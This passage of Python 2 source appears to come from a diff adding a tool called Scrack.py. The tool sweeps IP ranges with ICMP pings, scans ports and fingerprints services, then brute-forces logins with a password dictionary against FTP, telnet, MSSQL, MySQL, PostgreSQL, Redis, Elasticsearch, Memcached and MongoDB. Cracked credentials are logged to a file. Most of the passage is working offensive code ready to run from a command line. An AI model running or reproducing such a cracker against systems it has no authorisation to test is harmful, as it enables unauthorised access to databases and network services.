len(m)>3:del m[0] + scramble = m[0] + m[1] + except: + return '','' + try: + plugin = m[2] + except: + pass + return plugin,scramble + def get_auth_data(self,user,password,scramble,plugin): + user_hex = binascii.b2a_hex(user) + pass_hex = binascii.b2a_hex(self.get_hash(password,scramble)) + data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0014" + pass_hex + if plugin:data+=binascii.b2a_hex(plugin)+ "0055035f6f73076f737831302e380c5f636c69656e745f6e616d65086c69626d7973716c045f7069640539323330360f5f636c69656e745f76657273696f6e06352e362e3231095f706c6174666f726d067838365f3634" + len_hex = hex(len(data)/2).replace("0x","") + auth_data = len_hex + "000001" +data + return binascii.a2b_hex(auth_data) + def make_response(self,buf,username,password,salt): + pu=hashlib.md5(password+username).hexdigest() + buf=hashlib.md5(pu+salt).hexdigest() + return 'md5'+buf +class SendPingThr(threading.Thread): + def __init__(self, ipPool, icmpPacket, icmpSocket, timeout=3): + threading.Thread.__init__(self) + self.Sock = icmpSocket + self.ipPool = ipPool + self.packet = icmpPacket + self.timeout = timeout + self.Sock.settimeout(timeout + 1) + def run(self): + time.sleep(0.01) + for ip in self.ipPool: + 
try: + self.Sock.sendto(self.packet, (ip, 0)) + except socket.timeout: + break + time.sleep(self.timeout) + +class Nscan: + def __init__(self, timeout=3): + self.timeout = timeout + self.__data = struct.pack('d', time.time()) + self.__id = os.getpid() + if self.__id >= 65535:self.__id = 65534 + @property + def __icmpSocket(self): + Sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp")) + return Sock + + def __inCksum(self, packet): + if len(packet) & 1: + packet = packet + '\0' + words = array.array('h', packet) + sum = 0 + for word in words: + sum += (word & 0xffff) + sum = (sum >> 16) + (sum & 0xffff) + sum = sum + (sum >> 16) + return (~sum) & 0xffff + + @property + def __icmpPacket(self): + header = struct.pack('bbHHh', 8, 0, 0, self.__id, 0) + packet = header + self.__data + chkSum = self.__inCksum(packet) + header = struct.pack('bbHHh', 8, 0, chkSum, self.__id, 0) + return header + self.__data + + def mPing(self, ipPool): + Sock = self.__icmpSocket + Sock.settimeout(self.timeout) + packet = self.__icmpPacket + recvFroms = set() + sendThr = SendPingThr(ipPool, packet, Sock, self.timeout) + sendThr.start() + while True: + try: + ac_ip = Sock.recvfrom(1024)[1][0] + if ac_ip not in recvFroms: + log("active",ac_ip,0,None) + recvFroms.add(ac_ip) + except Exception: + pass + finally: + if not sendThr.isAlive(): + break + return recvFroms & ipPool +def get_ac_ip(ip_list): + try: + s = Nscan() + ipPool = set(ip_list) + return s.mPing(ipPool) + except Exception,e: + print 'The current user permissions unable to send icmp packets' + return ip_list +class ThreadNum(threading.Thread): + def __init__(self,queue): + threading.Thread.__init__(self) + self.queue = queue + def run(self): + while True: + try: + if queue.empty():break + queue_task = self.queue.get() + except: + break + try: + task_type,task_host,task_port = queue_task.split(":") + if task_type == 'portscan': + data = scan_port(task_host,task_port) + if data: + server_name = 
server_discern(task_host,task_port,data) + if server_name: + log('discern',task_host,task_port,server_name) + queue.put(":".join([server_name,task_host,task_port])) + else: + result = pass_crack(task_type,task_host,task_port) + if result and result !=3:log(task_type,task_host,task_port,result) + except Exception,e: + continue +def scan_port(host,port): + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((str(host),int(port))) + log('portscan',host,port) + except Exception,e: + return False + try: + data = sock.recv(512) + if len(data) > 2: + return data + else: + sock.send('a\n\n') + data = sock.recv(512) + sock.close() + if len(data) > 2: + return data + else: + return 'NULL' + except Exception,e: + sock.close() + return 'NULL' +def log(scan_type,host,port,info=''): + mutex.acquire() + time_str = time.strftime('%X', time.localtime( time.time())) + if scan_type == 'portscan': + print "[%s] %s:%d open"%(time_str,host,int(port)) + elif scan_type == 'discern': + print "[%s] %s:%d is %s"%(time_str,host,int(port),info) + elif scan_type == 'active': + print "[%s] %s active" % (time_str, host) + elif info: + log = "[*%s] %s:%d %s %s"%(time_str,host,int(port),scan_type,info) + print log + log_file = open('result.log','a') + log_file.write(log+"\r\n") + log_file.close() + mutex.release() +def server_discern(host,port,data): + for mark_info in REGEX: + try: + name,default_port,reg = mark_info + if reg and data <> 'NULL': + matchObj = re.search(reg,data,re.I|re.M) + if matchObj: + return name + elif int(default_port) == int(port): + return name + except Exception,e: + #print e + continue +def pass_crack(server_type,host,port): + m = Crack(host,port,server_type,TIMEOUT) + return m.run() +def get_password_dic(path): + pass_list = [] + try: + file_ = open(path,'r') + for password in file_: + pass_list.append(password.strip()) + file_.close() + return pass_list + except: + return 'read dic error' +def get_ip_list(ip): + ip_list = [] + iptonum = lambda 
x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])]) + numtoip = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)]) + if '-' in ip: + ip_range = ip.split('-') + ip_start = long(iptonum(ip_range[0])) + ip_end = long(iptonum(ip_range[1])) + ip_count = ip_end - ip_start + if ip_count >= 0 and ip_count <= 65536: + for ip_num in range(ip_start,ip_end+1): + ip_list.append(numtoip(ip_num)) + else: + print '-h wrong format' + elif '.ini' in ip: + ip_config = open(ip,'r') + for ip in ip_config: + ip_list.extend(get_ip_list(ip.strip())) + ip_config.close() + else: + ip_split=ip.split('.') + net = len(ip_split) + if net == 2: + for b in range(1,255): + for c in range(1,255): + ip = "%s.%s.%d.%d"%(ip_split[0],ip_split[1],b,c) + ip_list.append(ip) + elif net == 3: + for c in range(1,255): + ip = "%s.%s.%s.%d"%(ip_split[0],ip_split[1],ip_split[2],c) + ip_list.append(ip) + elif net ==4: + ip_list.append(ip) + else: + print "-h wrong format" + return ip_list +def t_join(m_count): + tmp_count = 0 + i = 0 + if I < m_count: + count = len(ip_list) + 1 + else: + count = m_count + while True: + time.sleep(4) + ac_count = threading.activeCount() + #print ac_count,count + if ac_count < count and ac_count == tmp_count: + i+=1 + else: + i=0 + tmp_count = ac_count + #print ac_count,queue.qsize() + if (queue.empty() and threading.activeCount() <= 1) or i > 5: + break +def put_queue(ip_list,port_list): + for ip in ip_list: + for port in port_list: + queue.put(":".join(['portscan',ip,port])) +if __name__=="__main__": + msg = ''' +Usage: python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] [-d pass.txt] [-n] + ''' + if len(sys.argv) < 2: + print msg + try: + options,args = getopt.getopt(sys.argv[1:],"h:p:m:t:d:n") + ip = '' + port = '21,23,1433,3306,5432,6379,9200,11211,27017' + m_count = 100 + ping = True + for opt,arg in options: + if opt == '-h': + ip = arg + elif opt == '-p': + port = arg + elif opt == '-m': + m_count = int(arg) + elif opt == '-t': + 
TIMEOUT = int(arg) + elif opt == '-n': + ping = False + elif opt == '-d': + PASSWORD_DIC = get_password_dic(arg) + socket.setdefaulttimeout(TIMEOUT) + if ip: + ip_list = get_ip_list(ip) + if ping:ip_list = get_ac_ip(ip_list) + port_list = port.split(',') + for ip_str in ip_list: + for port_int in port_list: + I+=1 + queue.put(':'.join(['portscan',ip_str,port_int])) + for i in range(m_count): + t = ThreadNum(queue) + t.setDaemon(True) + t.start() + t_join(m_count) + except Exception,e: + print msg